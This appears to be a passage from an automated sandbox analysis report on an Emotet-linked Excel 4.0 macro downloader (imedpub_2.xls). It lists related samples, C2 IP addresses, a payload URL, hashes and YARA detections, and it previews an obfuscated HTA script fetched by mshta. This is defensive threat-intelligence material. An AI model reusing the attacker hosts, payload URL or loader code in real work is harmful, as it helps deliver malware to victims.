                                                                    iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                      iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                        iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                          imedpub.xlsGet hashmaliciousBrowse
                                                                            InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                              innovinc.org.xlsGet hashmaliciousBrowse
                                                                                ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                                  Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                                    Innovincconferences.xlsGet hashmaliciousBrowse
                                                                                      zb.dllGet hashmaliciousBrowse
                                                                                        9vn5uo9AGs0AM.dllGet hashmaliciousBrowse
                                                                                          185.157.82.211imedpub_6.xlsGet hashmaliciousBrowse
                                                                                            imedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                              imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                  iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                    iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                                      NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                                                        iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                          iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                            iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                              iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                  imedpub.xlsGet hashmaliciousBrowse
                                                                                                                    InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                                      innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                                        ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                                                                          Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                                                                            Innovincconferences.xlsGet hashmaliciousBrowse
                                                                                                                              zb.dllGet hashmaliciousBrowse
                                                                                                                                9vn5uo9AGs0AM.dllGet hashmaliciousBrowse

                                                                                                                                  Domains

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  praachichemfood.comiMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                                  • 103.138.189.128
                                                                                                                                  OPAST GROUP LLC_1.xlsGet hashmaliciousBrowse
                                                                                                                                  • 103.138.189.128
                                                                                                                                  OPAST GROUP LLC.xlsGet hashmaliciousBrowse
                                                                                                                                  • 103.138.189.128
                                                                                                                                  cAqr3kM03S.xlsGet hashmaliciousBrowse
                                                                                                                                  • 103.138.189.128
                                                                                                                                  check copy.xlsGet hashmaliciousBrowse
                                                                                                                                  • 103.138.189.128
                                                                                                                                  Electronic form.xlsGet hashmaliciousBrowse
                                                                                                                                  • 103.138.189.128
                                                                                                                                  iMedPub LTD.xlsGet hashmaliciousBrowse
                                                                                                                                  • 103.138.189.128
                                                                                                                                  imedpub.com.xlsGet hashmaliciousBrowse
                                                                                                                                  • 103.138.189.128
                                                                                                                                  imedpub.xlsGet hashmaliciousBrowse
                                                                                                                                  • 103.138.189.128
                                                                                                                                  omicsonline.net.xlsGet hashmaliciousBrowse
                                                                                                                                  • 103.138.189.128
                                                                                                                                  dtmconsulting.caimedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  ommegaonline.org.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  Ommega Online Publishers.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  OPAST GROUP_3.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  OPAST GROUP LLC_1.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  OPAST GROUP LLC.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  opastonline.com.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  Opast Publishing Group_1.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  Opast Publishing Group.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  imedpub.com.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118

                                                                                                                                  ASNs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  S-NET-ASPLimedpub_6.xlsGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  imedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  imedpub.xlsGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  Innovincconferences.xlsGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  zb.dllGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  9vn5uo9AGs0AM.dllGet hashmaliciousBrowse
                                                                                                                                  • 185.157.82.211
                                                                                                                                  OnlineSASFRimedpub_6.xlsGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  imedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  imedpub.xlsGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  info_301.xlsGet hashmaliciousBrowse
                                                                                                                                  • 195.154.146.35
                                                                                                                                  InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  Innovincconferences.xlsGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22
                                                                                                                                  zb.dllGet hashmaliciousBrowse
                                                                                                                                  • 51.15.4.22

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  05af1f5ca1b87cc9cc9b25185115607dimedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  imedpub.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  Insight Medical Publishing_3.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  Insight Medical Publishing_4.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  ommegaonline.org.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  Ommega Online Publishers.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  OPAST GROUP_3.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  OPAST GROUP LLC_1.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  OPAST GROUP LLC.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  opastonline.com.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  Opast Publishing Group_1.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118
                                                                                                                                  Opast Publishing Group.xlsGet hashmaliciousBrowse
                                                                                                                                  • 162.241.211.118

                                                                                                                                  Dropped Files

                                                                                                                                  No context

                                                                                                                                  Created / dropped Files

                                                                                                                                  C:\ProgramData\QWER.dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):548864
                                                                                                                                  Entropy (8bit):6.980518565537256
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:B2AavzUBPSczbeeTLjvAyMwWd3DYr6i64/:OUBPSczbeeTnvQZDWA
                                                                                                                                  MD5:DC3651F090CC027069575CCE3F7B11C4
                                                                                                                                  SHA1:9513FDDD90160C21615F24A051CCECB26BB9EE5D
                                                                                                                                  SHA-256:9682B131292899C92EF867EB6DBE43FA3FB0916D7F470BF1BBE40B9A4A69729A
                                                                                                                                  SHA-512:1CB63DD9A694BCEF30F01457C0806B2D13782CC3E6210661111588F3A19E63BDBA231EAD6CC82495DD9A7232462598F6EBEBC8F801BE648099CC9F2D6315D09D
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\QWER.dll, Author: Joe Security
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\System32\mshta.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:downloaded
                                                                                                                                  Size (bytes):11027
                                                                                                                                  Entropy (8bit):6.187715019052575
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:aY9CkQSLcutiKMw/kx/TgCjOQRH3akr8c7cI/WAgaPJgij2Ij9dSS8i42Kb50:aYckKutitw/ggq8eWAnP+ri42N
                                                                                                                                  MD5:EC79EBD9247684CA6AED0631679B7225
                                                                                                                                  SHA1:10BC16397275BC56C513E173DB9F7A58711FAFB7
                                                                                                                                  SHA-256:04A7C11B6B3FD46B8C10A2F970A3456BAF275F99EF545C45B8A458DA78AECD83
                                                                                                                                  SHA-512:2FE9F6F17F6F58FD0C95FF76D6B80895C3237E84D6C7C144FCDFD7690B780D5F9462C0A77B32FBE1B8C5D9FD35A74FA58F95EC671BE5D761263611669DB26B32
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  IE Cache URL:http://91.240.118.168/zqqw/zaas/fe.html
                                                                                                                                  Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';f92w28H012li5=new Array();p2xiF27Es7QcM=new Array();p2xiF27Es7QcM[0]='o\161%38%38%38%34f%31' ;f92w28H012li5[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'.\\.1.6.6.%.6.1}..6.2.

                                                                                                                                  C:\Users\user\AppData\Local\Temp\48F2.tmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1536
                                                                                                                                  Entropy (8bit):1.1464700112623651
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                                  MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                                  SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                                  SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                                  SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF0A9EAC97075E8A20.TMP

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):512
                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3::
                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF81471AFDD24A7D20.TMP

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):28672
                                                                                                                                  Entropy (8bit):2.6611029621829974
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:RUFNjmg+HymsPck3hbdlylKsgqopeJBWhZFGkE+cMLm:Rs+HymsPck3hbdlylKsgqopeJBWhZFGJ
                                                                                                                                  MD5:5466502BF12D75D5AECAD7ADFAA7B292
                                                                                                                                  SHA1:9B3419DBC202E3EB30E3E161931B7E901533BFB4
                                                                                                                                  SHA-256:F1000CEA9C2D150929AB2FA833D0C3852FF7518A215F10A2DAA612527800C478
                                                                                                                                  SHA-512:CC5A9FD616561D088B8798547FB75A5C7302505847F73C1867EAA69DF6BECA195BC50D66B0E7EFF17C4AB2E5B0D3FE61DAEB14B78CA18404826C0C3B9A1BCB8F
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2HUD8O4FXE81UE2DXS2A.temp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8016
                                                                                                                                  Entropy (8bit):3.580974733007209
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:chQCQMqKqvsqvJCwojz8hQCQMqKqvsEHyqvJCworBzKAYnH0UVX/lUV9A2:cWzojz8WnHnorBzKYUVXaA2
                                                                                                                                  MD5:0B79CF7DDEACFEE528CDA82A673274A1
                                                                                                                                  SHA1:22B72DFB6B7340BDF951442AD79C09C0BE116DF1
                                                                                                                                  SHA-256:463C2277420E4CB12AED5357E257DBB41FC03F1188F6695D188D04369783A542
                                                                                                                                  SHA-512:BB550AF949D7631F601FBB15AA1FAB3F558C28FA4B2A94BABA7496C3910E6AAFAAC443438553E08528D5A4A23FBEAE92B66142DC1BC9FF09E6F04717234F5A6D
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8016
                                                                                                                                  Entropy (8bit):3.580974733007209
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:chQCQMqKqvsqvJCwojz8hQCQMqKqvsEHyqvJCworBzKAYnH0UVX/lUV9A2:cWzojz8WnHnorBzKYUVXaA2
                                                                                                                                  MD5:0B79CF7DDEACFEE528CDA82A673274A1
                                                                                                                                  SHA1:22B72DFB6B7340BDF951442AD79C09C0BE116DF1
                                                                                                                                  SHA-256:463C2277420E4CB12AED5357E257DBB41FC03F1188F6695D188D04369783A542
                                                                                                                                  SHA-512:BB550AF949D7631F601FBB15AA1FAB3F558C28FA4B2A94BABA7496C3910E6AAFAAC443438553E08528D5A4A23FBEAE92B66142DC1BC9FF09E6F04717234F5A6D
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                                                                                                  C:\Users\user\Desktop\imedpub_2.xls

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 11:58:35 2022, Last Saved Time/Date: Thu Jan 27 13:02:02 2022, Security: 0
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):158208
                                                                                                                                  Entropy (8bit):7.176512065929886
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:Qs+Hyms0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIb4UgCEqM5mheHRAjNKnlGIzR:9+Hyms0k3hbdlylKsgqopeJBWhZFVE+h
                                                                                                                                  MD5:D3DD61166F5B818F87CCAA12F6148CB3
                                                                                                                                  SHA1:5EF2DEF5DAD29C53F64811FFAB09BD8EF50C0BAE
                                                                                                                                  SHA-256:E6D851663FB0D0C7B56F6522B751EFCAE34DC69A1AF4114C03FC94C832427332
                                                                                                                                  SHA-512:8327A085211044B78CB12676C6A0DA4FECF0ACBED073EB22F0F1358ABCE8B47DEDD287B4F72C026E18D4C02409B67665BA0C40653B44C5C28846746EC8E924A0
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\imedpub_2.xls, Author: John Lambert @JohnLaTwC
                                                                                                                                  • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\imedpub_2.xls, Author: Joe Security
                                                                                                                                  • Rule: INDICATOR_OLE_Excel4Macros_DL2, Description: Detects OLE Excel 4 Macros documents acting as downloaders, Source: C:\Users\user\Desktop\imedpub_2.xls, Author: ditekSHen
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview:......................>.......................3...........................0...1...2...................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...........

                                                                                                                                  C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr (copy)

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):548864
                                                                                                                                  Entropy (8bit):6.980518565537256
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:B2AavzUBPSczbeeTLjvAyMwWd3DYr6i64/:OUBPSczbeeTnvQZDWA
                                                                                                                                  MD5:DC3651F090CC027069575CCE3F7B11C4
                                                                                                                                  SHA1:9513FDDD90160C21615F24A051CCECB26BB9EE5D
                                                                                                                                  SHA-256:9682B131292899C92EF867EB6DBE43FA3FB0916D7F470BF1BBE40B9A4A69729A
                                                                                                                                  SHA-512:1CB63DD9A694BCEF30F01457C0806B2D13782CC3E6210661111588F3A19E63BDBA231EAD6CC82495DD9A7232462598F6EBEBC8F801BE648099CC9F2D6315D09D
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 11:58:35 2022, Last Saved Time/Date: Thu Jan 27 13:02:02 2022, Security: 0
                                                                                                                                  Entropy (8bit):7.166678736422083
                                                                                                                                  TrID:
                                                                                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                  File name:imedpub_2.xls
                                                                                                                                  File size:158528
                                                                                                                                  MD5:9152f953f0fb28e90fc2cdaa4dc8c6ce
                                                                                                                                  SHA1:e82a389da3baa5a094df5ecc49ac23aa951466d8
                                                                                                                                  SHA256:131c6cbabbaa04e8953a7647ed6a2245a415ff9a2fdd63620bdb9cdc29c479d4
                                                                                                                                  SHA512:5faf89afcc57078369e01276a62237d7e7598d40c0bdbc7796fd9e287794e09e8010f0a8b9f9ae0a61a40686fd8f03ae467f1ac64f1fc72a64942686c2c53f5f
                                                                                                                                  SSDEEP:3072:zs+Hyms0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIb4UgCEqM5mheHRAjNKnlGIz/:o+Hyms0k3hbdlylKsgqopeJBWhZFVE+P
                                                                                                                                  File Content Preview:........................>.......................3...........................0...1...2..........................................................................................................................................................................

